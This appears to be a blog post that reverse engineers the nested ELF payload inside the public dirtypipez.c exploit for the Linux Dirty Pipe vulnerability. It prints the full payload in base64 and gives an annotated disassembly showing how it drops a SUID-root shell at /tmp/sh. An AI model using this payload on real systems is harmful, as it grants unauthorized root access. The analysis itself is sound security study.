reading matryoshka elf / dirtypipez
While looking at the clever dirtypipez.c
exploit, I became curious
how this elfcode
was constructed.
On March 7 2022, Max Kellerman disclosed a vulnerability he found in
Linux kernel 5.8 and above called The Dirty Pipe
Vulnerability. Peter (blasty) at haxx.in
quickly created a SUID binary exploit for it, called
dirtypipez.c. This code contains a
tiny ELF binary which writes another binary to /tmp/sh
— the ELF
Matryoshka doll.
I was wondering how one parses this code — to ensure it does what it says it does, and just because.
The code looks like this:
unsigned char elfcode[] = {
/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
...
With a leading explanation:
// small (linux x86_64) ELF file matroshka doll that does;
// fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
// write(fd, elfcode, elfcode_len)
// chmod("/tmp/sh", 04755)
// close(fd);
// exit(0);
//
// the dropped ELF simply does:
// setuid(0);
// setgid(0);
// execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
Base64 encoded, the entire elfcode is:
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB
AAAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAlwEAAAAAAACXAQAAAAAAAAAQ
AAAAAAAASI09VgAAAEjHxkECAABIx8ACAAAADwVIicdIjTVEAAAASMfCugAAAEjHwAEAAAAPBUjH
wAMAAAAPBUiNPRwAAABIx8btCQAASMfAWgAAAA8FSDH/SMfAPAAAAA8FL3RtcC9zaAB/RUxGAgEB
AAAAAAAAAAAAAgA+AAEAAAB4AEAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAA4AAEAAAAAAAAA
AQAAAAUAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAC6AAAAAAAAALoAAAAAAAAAABAAAAAAAABI
Mf9Ix8BpAAAADwVIMf9Ix8BqAAAADwVIjT0bAAAAagBIieJXSInmSMfAOwAAAA8FSMfAPAAAAA8F
L2Jpbi9zaAA=
Let's place that in decoded form in dirtypipez-matryoshka.elf
.
Now, how do we read this blob?
$ readelf -h dirtypipez-matryoshka.elf
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
...
Entry point address: 0x400078
Start of program headers: 64 (bytes into file)
Start of section headers: 0 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
...
$ readelf -l dirtypipez-matryoshka.elf
Elf file type is EXEC (Executable file)
Entry point 0x400078
There is 1 program header, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x0000000000000197 0x0000000000000197 R E 0x1000
So, the entrypoint is at 0x400078 - 0x400000 = 0x78
, which coincides
with 64 (elf header) + 56 (program header) = 0x78
. Time to
disassemble using objdump(1):
$ objdump -D -m i386:x86-64 -b binary \
--start-address=0x78 dirtypipez-matryoshka.elf
...
We'll need a few prerequisites to be able to annotate that output.
$ grep -E '#define (O_WRONLY|O_CREAT|O_TRUNC)' \
/usr/include/asm-generic/fcntl.h
#define O_WRONLY 00000001
#define O_CREAT 00000100 /* not fcntl */
#define O_TRUNC 00001000 /* not fcntl */
$ grep -E '^#define __NR_.* (1|2|3|59|60|90|105|106)$' \
/usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_write 1
#define __NR_open 2
#define __NR_close 3
#define __NR_execve 59
#define __NR_exit 60
#define __NR_chmod 90
#define __NR_setuid 105
#define __NR_setgid 106
Remembering the calling conventions, we know:
- the first 6 arguments to functions are stored in
%rdi
,%rsi
,%rdx
,%rcx
,%r8
,%r9
; - the return value is stored in
%rax
(and for large values also%rdx
); - the syscall number is stored in
%rax
.
After adding some annotations, the objdump output looks like this:
0000000000000078 <.data+0x78>:
78: 48 8d 3d 56 00 00 00 lea 0x56(%rip),%rdi # "/tmp/sh" at 0x7f+0x56=0xd5
7f: 48 c7 c6 41 02 00 00 mov $0x241,%rsi # O_WRONLY(0x1) | O_CREAT(0x40) | O_TRUNC(0x200)
86: 48 c7 c0 02 00 00 00 mov $0x2,%rax # __NR_open
8d: 0f 05 syscall # // open("/tmp/sh", 0x241)
8f: 48 89 c7 mov %rax,%rdi # use return value (fd) as argument 1
92: 48 8d 35 44 00 00 00 lea 0x44(%rip),%rsi # "\x7fELF..." at 0x99+0x44=0xdd
99: 48 c7 c2 ba 00 00 00 mov $0xba,%rdx # inner_elfcode_len (0xba)
a0: 48 c7 c0 01 00 00 00 mov $0x1,%rax # __NR_write
a7: 0f 05 syscall # // write(fd, inner_elfcode, inner_elfcode_len)
a9: 48 c7 c0 03 00 00 00 mov $0x3,%rax # __NR_close
b0: 0f 05 syscall # // close(fd) // arg1 was reused
b2: 48 8d 3d 1c 00 00 00 lea 0x1c(%rip),%rdi # "/tmp/sh" at 0xb9+0x1c=0xd5
b9: 48 c7 c6 ed 09 00 00 mov $0x9ed,%rsi # 0o4755
c0: 48 c7 c0 5a 00 00 00 mov $0x5a,%rax # __NR_chmod
c7: 0f 05 syscall # // chmod("/tmp/sh", 04755)
c9: 48 31 ff xor %rdi,%rdi # 0
cc: 48 c7 c0 3c 00 00 00 mov $0x3c,%rax # __NR_exit
d3: 0f 05 syscall # // exit(0)
d5: 2f 74 6d 70 2f 73 68 00 # "/tmp/sh\0"
We can examine the inner (Matryoshka) ELF as well, which is at 0xdd:
$ dd bs=1 if=dirtypipez-matryoshka.elf \
skip=$((0xdd)) of=dirtypipez-inner.elf
readelf(1) shows that the inner ELF also starts at 0x78. We can read it from the outer elfcode directly:
$ objdump -D -m i386:x86-64 -b binary \
--start-address=$((0xdd + 0x78)) \
dirtypipez-matryoshka.elf
...
The only data there starts at 0x18f:
$ dd bs=1 if=dirtypipez-matryoshka.elf \
skip=$((0x18f)) 2>/dev/null | hd
00000000 2f 62 69 6e 2f 73 68 00 |/bin/sh.|
I'll leave parsing of the assembly to the interested reader. But it checks out.
Likely, one could make the ELF even smaller by abusing the headers, but that wasn't the exercise. Although it could be a fun one.